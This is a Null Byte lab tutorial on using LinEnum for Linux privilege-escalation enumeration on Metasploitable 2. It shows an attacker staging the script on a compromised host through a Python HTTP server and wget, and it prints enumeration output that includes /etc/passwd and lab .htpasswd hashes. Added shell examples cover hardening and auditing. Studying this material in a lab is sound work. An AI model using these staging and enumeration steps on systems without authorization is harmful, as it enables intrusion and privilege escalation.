Using LinEnum to Identify Potential Privilege Escalation Vectors «Null Byte :: WonderHowTo

The art of privilege escalation is a skill that every competent hacker should possess. It's a whole field in itself and it's good to know how to do the techniques manually, but it's often more efficient when a script automates the process. LinEnum is one such script that can be incredibly useful for escalating privileges on Linux systems.

Privilege escalation means exploiting a bug or configuration error to obtain higher privileges than the current user has. Typically, that means going from a user-level shell to a root shell on Unix, or to a SYSTEM shell on Windows.

There are a variety of techniques for escalating privileges, and it can easily take years to master them all. On Linux, there are several basic methods for extending your permissions, as described in g0tmi1k's famous blog post. Many of those commands can be automated, however, and that is exactly what LinEnum does.

LinEnum is a simple bash script that runs the common commands used when looking for privilege escalation, saving time and cutting down the manual work of rooting a box. It is not a perfect solution: there may be false positives or missing information, so it is always a good idea to check the interesting items manually after running the script.

In this guide, we use Metasploitable 2 as the target and Kali Linux as the attack machine, but any similar lab setup you already have will do. The guide assumes you already have a low-privilege shell on the target.

Step 1: Prepare the Script on the Attack Machine

First, create a working directory just to keep things organized. Feel free to name it whatever you want, then change into it.

  ~# mkdir linenum
  ~# cd linenum/

LinEnum is hosted on GitHub. The easiest way to get the script is to download the raw file directly from GitHub with wget, as shown below.

  ~/linenum# wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

  --2019-05-06 11:24:05--  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
  Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
  Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 45639 (45K) [text/plain]
  Saving to: 'LinEnum.sh'

  LinEnum.sh          100%[===================>]  44.57K  --.-KB/s    in 0.05s

  2019-05-06 11:24:05 (872 KB/s) - 'LinEnum.sh' saved [45639/45639]

With the script in our directory, we can use Python to serve the file to the target. The easiest way is the SimpleHTTPServer module.

  ~/linenum# python -m SimpleHTTPServer

  Serving HTTP on 0.0.0.0 port 8000 ...

This module serves the contents of the directory it is started in on port 8000, bound to every interface (0.0.0.0), so start it in a directory that holds only what you intend to share. Any other port can be given as an argument, as shown below. (SimpleHTTPServer is Python 2 only; on Python 3 the equivalent is python3 -m http.server.)

  ~/linenum# python -m SimpleHTTPServer 1337

  Serving HTTP on 0.0.0.0 port 1337 ...

Step 2: Download the Script to the Target Machine

Next, change to a directory on the target where the file can be placed. I like to use /var/tmp, but any world-writable directory is a good choice.

  www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /var/tmp

Other good candidates are:

  • /tmp
  • /dev/shm
  • /var/lock
  • /run/lock

Now we need a way to transfer the file. Utilities such as wget and curl are usually available on Linux systems and provide an easy way to fetch files. Use the which command to check whether one of them is installed.

  www-data@metasploitable:/var/tmp$ which wget

  /usr/bin/wget

Then download LinEnum to the target.

  www-data@metasploitable:/var/tmp$ wget 10.10.0.1:1337/LinEnum.sh

  --10:20:58--  http://10.10.0.1:1337/LinEnum.sh
             => `LinEnum.sh'
  Connecting to 10.10.0.1:1337... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 45,639 (45K) [text/x-sh]

  100%[==================================================>] 45,639        --.--K/s

  10:20:58 (38.45 MB/s) - `LinEnum.sh' saved [45639/45639]

If we look at the permissions, the script is not yet executable.

  www-data@metasploitable:/var/tmp$ ls -la

  total 60
  drwxrwxrwt  2 root     root      4096 Aug  8 10:20 .
  drwxr-xr-x 14 root     root      4096 Mar 17  2010 ..
  -rw-r--r--  1 www-data www-data 45639 May  6  2019 LinEnum.sh

We can make it executable with the chmod command.

  www-data@metasploitable:/var/tmp$ chmod +x LinEnum.sh

If we display the permissions again, the file now shows as executable.

  www-data@metasploitable:/var/tmp$ ls -la

  total 60
  drwxrwxrwt  2 root     root      4096 Aug  8 10:20 .
  drwxr-xr-x 14 root     root      4096 Mar 17  2010 ..
  -rwxr-xr-x  1 www-data www-data 45639 May  6  2019 LinEnum.sh
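
As an added example (not code from the Null Byte article or the LinEnum project), here are the same staging steps wrapped in a few shell functions: pick whichever of wget or curl exists on the host, and refuse to mark the downloaded script executable unless its SHA-256 matches a value recorded beforehand from the pinned commit you reviewed. The URL and hash in the usage comment are placeholders, not values from the article.

```shell
#!/usr/bin/env bash
# Added example, not from the Null Byte article or the LinEnum project:
# stage a helper script with whichever downloader is present, then only
# grant it the executable bit when its SHA-256 matches a value you recorded
# in advance (for example, from a pinned commit of the repository).

# Print the name of the first downloader available on this host, or nothing.
pick_downloader() {
    for tool in wget curl; do
        if command -v "$tool" >/dev/null 2>&1; then
            printf '%s\n' "$tool"
            return 0
        fi
    done
    return 1
}

# Download URL to DEST using wget or curl, whichever exists.
fetch_file() {
    url=$1; dest=$2
    case "$(pick_downloader)" in
        wget) wget -q -O "$dest" "$url" ;;
        curl) curl -fsSL -o "$dest" "$url" ;;
        *)    echo "no downloader available on this host" >&2; return 1 ;;
    esac
}

# Compute the SHA-256 of FILE with coreutils, or the BSD/macOS fallback.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Return 0 only if FILE hashes to EXPECTED and was marked executable;
# otherwise delete it and return 1, so a tampered or truncated download
# never becomes runnable by accident.
verify_and_mark_exec() {
    file=$1; expected=$2
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "hash mismatch for $file: got $actual" >&2
        rm -f "$file"
        return 1
    fi
    chmod +x "$file"
}

# Usage (both values below are PLACEHOLDERS; the hash must come from the
# exact commit you reviewed, not from the file you just downloaded):
#   fetch_file http://ATTACK_HOST:1337/LinEnum.sh /var/tmp/LinEnum.sh
#   verify_and_mark_exec /var/tmp/LinEnum.sh EXPECTED_SHA256_PLACEHOLDER
```

The hash check is the point: a script pulled from a master branch can change between the time you read it and the time you run it, so record the digest of the revision you audited and compare against that.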

Step 3: Run LinEnum and Analyze Results

Once everything is in place, all that is left is to run LinEnum.

  www-data@metasploitable:/var/tmp$ ./LinEnum.sh

The script starts running and can take a little while to finish. Once it is done, we can start looking at the results, beginning with some system information, which can be helpful when researching kernel exploits:

  #########################################################
  # Local Linux Enumeration & Privilege Escalation Script #
  #########################################################
  # www.rebootuser.com
  # version 0.96

  [-] Debug Info
  [+] Thorough tests = Disabled

  Scan started at:
  Wed Aug  8 10:23:33 EDT 2018

  ### SYSTEM ##############################################
  [-] Kernel information:
  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

  [-] Kernel information (continued):
  Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

  [-] Specific release information:
  DISTRIB_ID=Ubuntu
  DISTRIB_RELEASE=8.04
  DISTRIB_CODENAME=hardy
  DISTRIB_DESCRIPTION="Ubuntu 8.04"

  [-] Hostname:
  metasploitable

Next, we get some user information, such as previously logged-in users and details on the current user:

  ### USER/GROUP ##########################################
  [-] Current user/group info:
  uid=33(www-data) gid=33(www-data) groups=33(www-data)

  [-] Users that have previously logged onto the system:
  Username         Port     From             Latest
  root             pts/0    :0.0             Wed Aug  8 09:46:22 -0400 2018
  msfadmin         tty1                      Wed Aug  8 09:47:11 -0400 2018

  [-] Who else is logged on:
   10:23:33 up 38 min,  2 users,  load average: 0.01, 0.02, 0.00
  USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  msfadmin tty1     -                 09:47   35:59m  0.19s  0.09s -bash
  root     pts/0    :0.0              09:46   37:14m  0.04s  0.04s -bash

It also gives us the contents of /etc/passwd, which is helpful for listing the users on the machine:

  [-] Contents of /etc/passwd:
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/bin/sh
  man:x:6:12:man:/var/cache/man:/bin/sh
  lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  mail:x:8:8:mail:/var/mail:/bin/sh
  news:x:9:9:news:/var/spool/news:/bin/sh
  uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  proxy:x:13:13:proxy:/bin:/bin/sh
  www-data:x:33:33:www-data:/var/www:/bin/sh
  backup:x:34:34:backup:/var/backups:/bin/sh
  list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  dhcp:x:101:102::/nonexistent:/bin/false
  syslog:x:102:103::/home/syslog:/bin/false
  klog:x:103:104::/home/klog:/bin/false
  sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
  msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
  bind:x:105:113::/var/cache/bind:/bin/false
  postfix:x:106:115::/var/spool/postfix:/bin/false
  ftp:x:107:65534::/home/ftp:/bin/false
  postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
  tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
  distccd:x:111:65534::/:/bin/false
  user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
  service:x:1002:1002:,,,:/home/service:/bin/bash
  telnetd:x:112:120::/nonexistent:/bin/false
  proftpd:x:113:65534::/var/run/proftpd:/bin/false
  statd:x:114:65534::/var/lib/nfs:/bin/false

Then we get information related to the superuser account: whether we can sudo, which accounts have recently used sudo, the permissions on root's home directory, and whether root may log in over SSH:

  [-] Super user account(s):
  root

  [+] We can sudo without supplying a password!
  usage: sudo -h | -K | -k | -L | -l | -V | -v
  usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
              {-i | -s | <command>}
  usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...

  [-] Accounts that have recently used sudo:
  /home/msfadmin/.sudo_as_admin_successful

  [+] We can read root's home directory!
  total 76K
  drwxr-xr-x 13 root root 4.0K Aug  8 09:46 .
  drwxr-xr-x 21 root root 4.0K Jan 15  2019 ..
  -rw-------  1 root root  324 Aug  8 09:46 .Xauthority
  lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
  -rw-r--r--  1 root root 2.2K Oct 20  2007 .bashrc
  drwx------  3 root root 4.0K May 20  2012 .config
  drwx------  2 root root 4.0K May 20  2012 .filezilla
  drwxr-xr-x  5 root root 4.0K Aug  8 09:46 .fluxbox
  drwx------  2 root root 4.0K May 20  2012 .gconf
  drwx------  2 root root 4.0K May 20  2012 .gconfd
  drwxr-xr-x  2 root root 4.0K May 20  2012 .gstreamer-0.10
  drwx------  4 root root 4.0K May 20  2012 .mozilla
  -rw-r--r--  1 root root  141 Oct 20  2007 .profile
  drwx------  5 root root 4.0K May 20  2012 .purple
  -rwx------  1 root root    4 May 20  2012 .rhosts
  drwxr-xr-x  2 root root 4.0K May 20  2012 .ssh
  drwx------  2 root root 4.0K Aug  8 09:46 .vnc
  drwxr-xr-x  2 root root 4.0K May 20  2012 Desktop
  -rwx------  1 root root  401 May 20  2012 reset_logs.sh
  -rw-r--r--  1 root root  138 Aug  8 09:46 vnc.log

  [-] Are permissions on /home directories lax:
  total 24K
  drwxr-xr-x  6 root     root     4.0K Apr 16  2010 .
  drwxr-xr-x 21 root     root     4.0K Jan 15  2019 ..
  drwxr-xr-x  2 root     nogroup  4.0K Mar 17  2010 ftp
  drwxr-xr-x  5 msfadmin msfadmin 4.0K Jun  6 13:03 msfadmin
  drwxr-xr-x  2 service  service  4.0K Apr 16  2010 service
  drwxr-xr-x  3 user     user     4.0K May  7  2010 user

  [-] Root is allowed to login via SSH:
  PermitRootLogin yes
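
The PermitRootLogin line above comes from a plain grep of sshd_config, which is all LinEnum does for this check. The following is an added example, not part of the article or of LinEnum, that reports the value sshd will actually apply, allowing for two sshd_config rules a grep ignores: the first top-level occurrence of a keyword wins (later duplicates are silently ignored), and lines under a Match block apply only to the connections that block selects. The configuration file it builds is constructed sample data, not a real host's.

```shell
#!/usr/bin/env bash
# Added example, not from the article or LinEnum: report the effective
# top-level value of an sshd_config keyword instead of every line that
# mentions it. sshd honours the FIRST occurrence of a keyword and ignores
# later duplicates; anything after a "Match" line is conditional and is
# not the global setting.

# Print the effective top-level value of KEYWORD in CONFIG, or "(default)"
# if the file never sets it at top level. Keyword matching is case-insensitive,
# as in sshd; both "Keyword value" and "Keyword=value" forms are accepted.
sshd_effective_value() {
    config=$1
    key=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    awk -v key="$key" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }                 # comments, blanks
        { sub(/=/, " ") }                                 # "Keyword=value" form
        tolower($1) == "match" { exit }                   # conditional block: stop
        tolower($1) == key { print $2; found = 1; exit }  # first hit wins
        END { if (!found) print "(default)" }
    ' "$config"
}

# Exit 0 when root password login over SSH is blocked, 1 when PermitRootLogin
# is "yes", 2 when the file does not set it at all: the built-in default has
# changed across OpenSSH releases, so in that case ask the running daemon
# with "sshd -T" rather than guessing.
check_root_login() {
    case "$(sshd_effective_value "$1" PermitRootLogin)" in
        no|prohibit-password|without-password|forced-commands-only) return 0 ;;
        yes) return 1 ;;
        *)   return 2 ;;
    esac
}

# Constructed sample configuration (not from a real host) written to a temp
# file; prints the path so the caller can pass it to the functions above.
sample_sshd_config() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample, not a real host's configuration
Port 22
LoginGraceTime=30
PermitRootLogin yes
PasswordAuthentication yes
# sshd ignores this later duplicate, so the line below changes nothing:
PermitRootLogin no
Match User deploy
    PermitRootLogin no
    PasswordAuthentication no
EOF
    printf '%s\n' "$f"
}
```

Run as a script, the sample reports "yes" for PermitRootLogin even though a later line says "no", which is exactly the case where reading the grep output and stopping at the last line would mislead in both directions.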

Next, we see all the cron jobs present on the machine, which can be especially useful for privilege escalation because these tasks are often run as root:

  ### JOBS/TASKS ##########################################
  [-] Cron jobs:
  -rw-r--r-- 1 root root 724 Apr  8  2008 /etc/crontab

  /etc/cron.d:
  total 20
  drwxr-xr-x  2 root root 4096 Jul  5 16:19 .
  drwxr-xr-x 94 root root 4096 Aug  8 09:45 ..
  -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
  -rw-r--r--  1 root root  507 May  3  2012 php5
  -rw-r--r--  1 root root 1323 Mar 31  2008 postgresql-common

  /etc/cron.daily:
  total 60
  drwxr-xr-x  2 root root 4096 Apr 28  2010 .
  drwxr-xr-x 94 root root 4096 Aug  8 09:45 ..
  -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
  -rwxr-xr-x  1 root root  633 Feb  1  2008 apache2
  -rwxr-xr-x  1 root root 7441 Apr 22  2008 apt
  -rwxr-xr-x  1 root root  314 Apr  4  2008 aptitude
  -rwxr-xr-x  1 root root  502 Dec 12  2007 bsdmainutils
  -rwxr-xr-x  1 root root   89 Jun 19  2006 logrotate
  -rwxr-xr-x  1 root root  954 Mar 12  2008 man-db
  -rwxr-xr-x  1 root root  183 Mar  8  2008 mlocate
  -rwxr-xr-x  1 root root  383 Apr 28  2010 samba
  -rwxr-xr-x  1 root root 3295 Apr  8  2008 standard
  -rwxr-xr-x  1 root root 1309 Nov 23  2007 sysklogd
  -rwxr-xr-x  1 root root  477 Dec  7  2008 tomcat55

  /etc/cron.hourly:
  total 12
  drwxr-xr-x  2 root root 4096 Mar 16  2010 .
  drwxr-xr-x 94 root root 4096 Aug  8 09:45 ..
  -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder

  /etc/cron.monthly:
  total 20
  drwxr-xr-x  2 root root 4096 Apr 28  2010 .
  drwxr-xr-x 94 root root 4096 Aug  8 09:45 ..
  -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
  -rwxr-xr-x  1 root root  664 Feb 20  2008 proftpd
  -rwxr-xr-x  1 root root  129 Apr  8  2008 standard

  /etc/cron.weekly:
  total 24
  drwxr-xr-x  2 root root 4096 Mar 16  2010 .
  drwxr-xr-x 94 root root 4096 Aug  8 09:45 ..
  -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
  -rwxr-xr-x  1 root root  528 Mar 12  2008 man-db
  -rwxr-xr-x  1 root root 2522 Jan 28  2008 popularity-contest
  -rwxr-xr-x  1 root root 1220 Nov 23  2007 sysklogd
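
A listing like the one above only tells you which cron files exist; what matters for escalation (and for hardening) is whether a job run by root executes something a less privileged user can modify. The following added example, not from the article or LinEnum, walks a system-format crontab and flags jobs whose script file, or the directory it lives in, is writable by others. The crontab and the scripts it references are constructed for the dry run.

```shell
#!/usr/bin/env bash
# Added example, not from the article or LinEnum: audit a system-format
# crontab (minute hour day month weekday user command) for jobs whose
# script can be modified or replaced by users other than its owner.

# True if "others" have write permission on PATH (9th char of the mode string).
other_writable() {
    [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# True if anyone can replace entries in directory DIR: world-writable and
# traversable with no sticky bit. Sticky dirs such as /tmp (drwxrwxrwt) show
# a "t" in the last position and are not flagged, because other users cannot
# rename or delete files they do not own there.
dir_replaceable() {
    case "$(ls -ld "$1" | cut -c1-10)" in
        ????????wx) return 0 ;;
        *)          return 1 ;;
    esac
}

# Print one line per suspicious job:
#   "WRITABLE path (runs as user)"  script or its directory is modifiable by others
#   "MISSING path (user)"           the path no longer exists (a dangling root job
#                                   pointing into a writable location is worth a look)
# Comment lines, blank lines, VARIABLE=value lines and @reboot-style entries
# are skipped; commands that do not start with an absolute path are skipped too.
audit_crontab() {
    grep -Ev '^[[:space:]]*(#|@|$)|^[A-Za-z_]+=' "$1" |
    while read -r min hour dom mon dow user cmd; do
        path=$(printf '%s\n' "$cmd" | awk '{print $1}')   # first word of the command
        case "$path" in
            /*) ;;
            *)  continue ;;
        esac
        if [ ! -e "$path" ]; then
            printf 'MISSING %s (%s)\n' "$path" "$user"
        elif other_writable "$path" || dir_replaceable "$(dirname "$path")"; then
            printf 'WRITABLE %s (runs as %s)\n' "$path" "$user"
        fi
    done
}

# Usage on a real host (system crontab format; per-user crontabs have no
# user column and would need the read line adjusted):
#   audit_crontab /etc/crontab
#   for f in /etc/cron.d/*; do audit_crontab "$f"; done
```

For the run-parts directories such as /etc/cron.daily, the same two tests (other_writable on each script, dir_replaceable on the directory) apply directly, since every file in them is executed as root.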

Below is some information about specific software installed on the system. It includes version numbers, which are useful when researching exploits, and service-specific findings such as MySQL login names and permissions:

  ### SOFTWARE #############################################
  [-] Sudo version:
  Sudo version 1.6.9p10

  [-] MYSQL version:
  mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

  [+] We can connect to the local MYSQL service as 'root' and without a password!
  mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
  Copyright (C) 2000-2006 MySQL AB
  This software comes with ABSOLUTELY NO WARRANTY. This is free software,
  and you are welcome to modify and redistribute it under the GPL license

  Server version          5.0.51a-3ubuntu5
  Protocol version        10
  Connection              Localhost via UNIX socket
  UNIX socket             /var/run/mysqld/mysqld.sock
  Uptime:                 38 min 1 sec

  Threads: 2  Questions: 456  Slow queries: 0  Opens: 420  Flush tables: 1  Open tables: 64  Queries per second avg: 0.200

The script also searches for certain files that could contain passwords, such as .htpasswd files:

  [-] htpasswd found - could contain passwords:
  /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/.htpasswd
  TWikiGuest:zK.G.uuPi39Qg
  PeterThoeny:CQdjUgwC6YckI
  NicholasLee:h3i.9AzGUn4tQ
  AndreaSterbini:zuUMZlkXvUR6Y
  JohnTalintyre:2fl31yuNhvMrU
  MikeMannix:euHykHV5Q2miA
  RichardDonkin:pAVoSPpUf3xt2
  GrantBow:EI7XT7IJJV40A
  /var/www/twiki/data/.htpasswd
  TWikiGuest:zK.G.uuPi39Qg
  PeterThoeny:CQdjUgwC6YckI
  NicholasLee:h3i.9AzGUn4tQ
  AndreaSterbini:zuUMZlkXvUR6Y
  JohnTalintyre:2fl31yuNhvMrU
  MikeMannix:euHykHV5Q2miA
  RichardDonkin:pAVoSPpUf3xt2
  GrantBow:EI7XT7IJJV40A

Finally, it shows us potentially interesting SUID binaries, which in my opinion is the most useful feature of the script. These are programs that run with the privileges of their owner rather than of the user who launches them, and the owner is usually root. When certain programs are set SUID (for example, older versions of nmap), they can be abused to obtain a root shell:

  [-] Can we read/write sensitive files:
  -rw-r--r-- 1 root root   1581 May 13  2012 /etc/passwd
  -rw-r--r-- 1 root root    886 Apr 16  2010 /etc/group
  -rw-r--r-- 1 root root    497 May 13  2012 /etc/profile
  -rw-r----- 1 root shadow 1207 May 13  2012 /etc/shadow

  [-] SUID files:
  -rwsr-xr-x 1 root root 63584 Apr 14  2008 /bin/umount
  -rwsr-xr-- 1 root backup 20056 Feb 26  2008 /bin/fusermount
  -rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su
  -rwsr-xr-x 1 root root 81368 Apr 14  2008 /bin/mount
  -rwsr-xr-x 1 root root 30856 Dec 10  2007 /bin/ping
  -rwsr-xr-x 1 root root 26684 Dec 10  2007 /bin/ping6
  -rwsr-xr-x 1 root root 65520 Dec  2  2008 /sbin/mount.nfs
  -rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
  -rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudoedit
  -rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
  -rwsr-xr-x 1 root root 8524 Nov 22  2007 /usr/bin/netkit-rsh
  -rwsr-xr-x 1 root root 37360 Apr  2  2008 /usr/bin/gpasswd
  -rwsr-xr-x 1 root root 12296 Dec 10  2007 /usr/bin/traceroute6.iputils
  -rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudo
  -rwsr-xr-x 1 root root 12020 Nov 22  2007 /usr/bin/netkit-rlogin
  -rwsr-xr-x 1 root root 11048 Dec 10  2007 /usr/bin/arping
  -rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
  -rwsr-xr-x 1 root root 19144 Apr  2  2008 /usr/bin/newgrp
  -rwsr-xr-x 1 root root 28624 Apr  2  2008 /usr/bin/chfn
  -rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
  -rwsr-xr-x 1 root root 23952 Apr  2  2008 /usr/bin/chsh
  -rwsr-xr-x 1 root root 15952 Nov 22  2007 /usr/bin/netkit-rcp
  -rwsr-xr-x 1 root root 29104 Apr  2  2008 /usr/bin/passwd
  -rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
  -rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
  -rwsr-xr-- 1 root dip 269256 Oct  4  2007 /usr/sbin/pppd
  -rwsr-xr-- 1 root telnetd 6040 Dec 17  2006 /usr/lib/telnetlogin
  -rwsr-xr-- 1 root www-data 10276 Mar  9  2010 /usr/lib/apache2/suexec
  -rwsr-xr-x 1 root root 4524 Nov  5  2007 /usr/lib/eject/dmcrypt-get-device
  -rwsr-xr-x 1 root root 165748 Apr  6  2008 /usr/lib/openssh/ssh-keysign
  -rwsr-xr-x 1 root root 9624 Aug 17  2009 /usr/lib/pt_chown

  [+] Possibly interesting SUID files:
  -rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
  -rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
  -rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
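
LinEnum's "possibly interesting" list is a fixed set of binary names. For a defender, a stronger signal is any setuid file that was not present on a known-good build, whatever it is called. The following added example, not from the article or LinEnum, records that inventory and diffs a later snapshot against it; the baseline and current listings used for the dry run are constructed (the baseline borrows a few paths from the listing above, and the two extra entries in the current set are made up).

```shell
#!/usr/bin/env bash
# Added example, not from the article or LinEnum: baseline-and-diff check
# for setuid files. Record the setuid inventory of a clean build once, then
# alert whenever a later snapshot contains a path the baseline does not.

# Record every setuid file on local filesystems, one path per line, sorted.
# Keep the output somewhere the host itself cannot modify (configuration
# management, a read-only share), or the check can be defeated by editing it.
suid_snapshot() {
    find / -xdev -type f -perm -4000 2>/dev/null | sort
}

# Print every line of CURRENT that is not an exact line in BASELINE.
# grep -F -x -f treats each baseline line as a fixed, whole-line pattern, so
# /usr/bin/nmap does not swallow /usr/bin/nmap-helper by prefix. grep exits 1
# when nothing remains, which is the good case here, hence "|| true".
suid_new() {
    baseline=$1; current=$2
    grep -vxF -f "$baseline" "$current" || true
}

# Snapshot now and compare with a stored baseline. Exits non-zero and lists
# the newcomers when something has appeared, so it can drive a cron alert.
suid_check() {
    baseline=$1
    now=$(mktemp)
    suid_snapshot > "$now"
    new=$(suid_new "$baseline" "$now")
    rm -f "$now"
    if [ -z "$new" ]; then
        return 0
    fi
    printf 'new setuid files since baseline:\n%s\n' "$new"
    return 1
}

# Constructed sample data for a dry run (not a real host's inventory).
sample_baseline() {
    cat <<'EOF'
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/passwd
/usr/bin/sudo
EOF
}
sample_current() {
    cat <<'EOF'
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/nmap
/usr/bin/passwd
/usr/bin/sudo
/usr/local/bin/backup-helper
EOF
}

# Usage on a real host:
#   suid_snapshot > /path/to/readonly/suid.baseline   # once, on a clean build
#   suid_check /path/to/readonly/suid.baseline        # from cron, alert on exit 1
```

Paths alone miss a changed owner or added setgid bit, so extend the snapshot with owner and mode (for instance via find's -printf on GNU systems, or ls -l with the timestamp column dropped) if that matters to you; a file-integrity tool such as AIDE, or the package manager's verification command, gives the same answer with less tuning on managed hosts.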

Summary

Today we learned a bit about privilege escalation and how scripts like LinEnum can be incredibly useful for automating parts of it. We downloaded the script from GitHub, transferred it to the target, made it executable and ran it, then analyzed the results and looked at some common ways to use the output. With LinEnum, you can quickly identify potential privilege escalation vectors on Linux.

Cover image by drd_/Null Byte